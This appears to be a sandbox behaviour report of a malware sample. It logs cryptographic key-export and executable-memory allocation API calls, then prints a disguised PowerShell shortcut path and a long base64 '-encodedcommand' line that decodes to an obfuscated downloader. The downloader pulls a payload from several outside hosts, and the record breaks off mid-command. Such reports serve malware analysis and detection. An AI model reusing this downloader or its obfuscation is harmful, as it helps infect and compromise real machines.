crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0030a8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00309fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00309fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00309fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00309fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x742d2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02990000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1140
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73971000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1140
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73972000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02712000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02991000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02992000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02713000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02714000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0274b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02747000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02732000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02745000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02715000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02716000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0274c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02733000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02734000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02735000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02736000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02737000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02738000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02739000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05000000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05001000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05002000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05003000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05004000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05005000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05006000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05007000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05008000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05009000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05011000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -encodedcommand "JABQAHIAZQBzAGEAYwByAGEAbABEAHIAYQBnAGcAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAQQBBAEwAZwBBADUAQQBEAE0AQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAD0AbABkAHcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABNAEEATABnAEEAeQBBAEQAQQBBAE0AUQBBAHUAQQBEAEUAQQBOAEEAQQB5AEEAQwA0AEEATgBBAEEAeQBBAEEAPQA9AGwAZAB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAUQBBAE4AQQBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQwA0AEEATQBRAEEAMgBBAEQAWQBBAEwAZwBBADQAQQBEAFkAQQAiADsAJABtAGUAdABhAGwAbABpAGsAZQBMAG8AZwBsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQA4AEEAZABnAEIAbABBAEgASQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEARwBVAEEAYwBnAEIARQBBAEcAawBBAFkAUQBCAG4AQQBIAEkAQQBZAFEAQgB0AEEARwAwAEEAWQBRAEIAMABBAEcAawBBAFkAdwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARwBJAEEAZABRAEIANgBBAEgAbwBBAHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEMAQQBHAFUAQQBZAFEAQgAyAEEARwBVAEEAYwBnAEIAbABBAEcAUQBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQA9AHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBZAFEAQgBwAEEARwB3AEEAWQBnAEIAdgBBAEcARQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQQB1AEEARwBNAEEAWQBRAEIAbQBBAEcAVQBBAHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAGsAQQBMAGcAQQAzAEEARABVAEEATABnAEEAeQBBAEQASQBBAE4AdwBBAHUAQQBEAFkAQQBOAFEAQQA9ACIAOwAkAGIAZQB0AGkAcgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAWQBRAEIAcwBBAEcATQBBAFkAUQBCADAAQQBHAFUAQQBWAEEAQgAzAEEASABrAEEAWgBRAEIAeQBBAEgATQBBAEwAZwBCAHAAQQBHADgAQQBQAGoAZwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHgAQQBIAFUAQQBZAFEAQgBrAEEASABJAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAHMAQQBHAHcAQQBiAHcAQgAxAEEASABNAEEAVQBBAEIAdgBBAEcAdwBBAGIAQQBCADEAQQBIAFEAQQBaAFEAQgB6AEEAQwA0AEEAZABnAEIAcABBAEgAQQBBAFAAagBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADAAQQBDADQAQQBNAGcAQQB4AEEARABZAEEATABnAEEAMgBBAEQASQBBAEwAZwBBAHgAQQBEAGcAQQBOAEEAQQA9AFAAagBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADEAQQBDADQAQQBNAFEAQQB6AEEARABZAEEATABnAEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQQA9AD0AIgA7ACQAaAB5AHAAbwBpAG4AbwBzAGUAbQBpAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHADgAQQBjAHcAQgB6AEEARwBJAEEAWgBRAEIAeQBBAEgASQBBAGUAUQBCAFMAQQBIAFUAQQBiAFEAQgBpAEEASABVAEEAYwB3AEIAMABBAEcAawBBAGIAdwBCAHUAQQBDADQAQQBiAFEAQgB2AEEARwA0AEEAWgBRAEIANQBBAEEAPQA9AGwARwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHAHcAQQBlAFEAQgBFAEEARwBrAEEAYQBBAEIANQBBAEcAUQBBAGMAZwBCAHYAQQBIAGcAQQBlAFEAQgBoAEEARwBNAEEAWgBRAEIAMABBAEcAOABBAGIAZwBCAGwAQQBDADQAQQBaAGcAQgBoAEEASABJAEEAYgBRAEEAPQBsAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABFAEEATABnAEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEUAQQBOAHcAQQAyAEEAQwA0AEEATQBRAEEANQBBAEQASQBBAGwARwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQA1AEEAQwA0AEEATQBRAEEANABBAEQASQBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABZAEEATwBBAEEAPQAiADsAJABDAHkAdABvAGcAZQBuAGUAdABpAGMAUABvAGUAdABpAHoAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGIAQQBCAGgAQQBHAGsAQQBkAEEAQgBvAEEARwBVAEEAYwB3AEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBAEkAZQBQAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABNAEEATQB3AEEAdQBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQAxAEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AZwBBAD0AIgA7ACQAVABpAG4AZwBlAG4AdABVAHAAZABhAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE4AUQBBAHUAQQBEAFUAQQBPAFEAQQB1AEEARABJAEEATQBnAEEAdwBBAEMANABBAE0AZwBBAHcAQQBEAEUAQQBMAHcAQgBTAEEASABZAEEATAB3AEIAVABBAEYASQBBAE4AdwBCAEkAQQBBAD0APQBRAGkAcgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADQAQQBEAGMAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE4AdwBBADQAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATAB3AEIANgBBAEUAWQBBAGEAdwBCADUAQQBDADgAQQBkAEEAQgBhAEEARQBjAEEATQB3AEEAMABBAEEAPQA9AFEAaQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAMwBBAEMANABBAE4AZwBBADQAQQBDADgAQQBPAFEAQgBEAEEARwAwAEEATwBRAEIARgBBAEYAYwBBAEwAdwBCAEwAQQBIAGMAQQBVAHcAQgA2AEEARwBNAEEAYQBBAEIAMwBBAEEAPQA9AFEAaQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAMwBBAEMANABBAE8AUQBBAHkAQQBDADgAQQBTAGcAQgBVAEEARwBrAEEATAB3AEIAeABBAEYAVQBBAGQAUQBCAFQAQQBIAE0AQQBZAFEAQgBYAEEAQQA9AD0AUQBpAHIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEgATQBBAFUAQQBCAGkAQQBHAHMAQQBiAGcAQgBzAEEARQBRAEEATwBRAEIAdQBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFUAcgBiAGkAYwBvAGwAYQBlAEcAZQBuAGUAdABoAGwAaQBhAGMAaQBzAG0AIABpAG4AIAAkAFQAaQBuAGcAZQBuAHQAVQBwAGQAYQB0AGUAIAAtAHMAcABsAGkAdAAgACIAUQBpAHIAIgApACAAewAkAGMAaABlAG4AaQBlAHIAUwB3AGkAbgBnAGwAZQB0AGEAaQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAZABBAEIAcABBAEcANABBAFoAdwBCAGgAQQBIAEkAQQBaAFEAQgBsAEEARwBrAEEAYgBnAEIAbgBBAEUAdwBBAFkAUQBCAG4AQQBHADgAQQBiAFEAQgB2AEEASABJAEEAYwBBAEIAbwBBAEcAOABBAGQAUQBCAHoAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AVwB1AFcATABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAHcAQQBhAFEAQgB3AEEARwBRAEEAWQBRAEIAagBBAEcAZwBBAGMAdwBBAHUAQQBHAEUAQQBiAFEAQQA9AFcAdQBXAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBRAEEAdQBBAEQAVQBBAE8AUQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABFAEEATgBRAEEANABBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJABnAHIAbwB1AG4AZABzAGsAZQBlAHAAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATQBnAEEAegBBAEQAZwBBAEwAZwBBADEAQQBEAEEAQQBMAGcAQQA1AEEARABnAEEAaQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCAGoAQQBIAEkAQQBiAHcAQgB2AEEARwA0AEEAVAB3AEIAMgBBAEcAVQBBAGMAZwBCADAAQQBHAEUAQQBhAHcAQgBsAEEASABJAEEATABnAEIAbQBBAEcARQBBAGEAUQBCADAAQQBHAGcAQQAiADsAJABIAGUAbABsAGUAYgBvAHIAaQBuAGUASABhAGkAcgBzAHQAcgBlAGEAawAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABVAHIAYgBpAGMAbwBsAGEAZQBHAGUAbgBlAHQAaABsAGkAYQBjAGkAcwBtACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQASABlAGwAbABlAGIAbwByAGkAbgBlAEgAYQBpAHIAcwB0AHIAZQBhAGsAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwATQBpAHQAaQBnAGEAdABpAG8AbgBUAHIAaQBtAG0AaQBuAGcAbAB5AC4AYwBsAGEAdQBzAGUAcwA7ACQAYgBhAHMAawBlAHQAdwBvAHIAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAMwBBAEQAWQBBAEwAZwBBAHkAQQBEAFEAQQBNAGcAQQA9ACIAOwAkAEUAcwBjAGEAbABsAG8AcABzAE8AdgBlAHIAYQBzAHMAdQBtAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABNAEEATwBBAEEAdQBBAEQASQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQB6AEEARABFAEEATABnAEEAMQBBAEQASQBBAGcAdwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHADQAQQBkAEEAQgBwAEEASABNAEEAWQBRAEIAMgBBAEcARQBBAFoAdwBCAGwAQQBFAGcAQQBaAFEAQgBoAEEARwBRAEEAYwB3AEIAbwBBAEcARQBBAGEAdwBCAGwAQQBIAEkAQQBMAGcAQgBqAEEASABJAEEAWgBRAEIAawBBAEcAawBBAGQAQQBBAD0AIgA7ACQAdABoAGUAcgBzAGkAdABlAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADUAQQBDADQAQQBPAEEAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQATQBBAEwAZwBBAHkAQQBEAEUA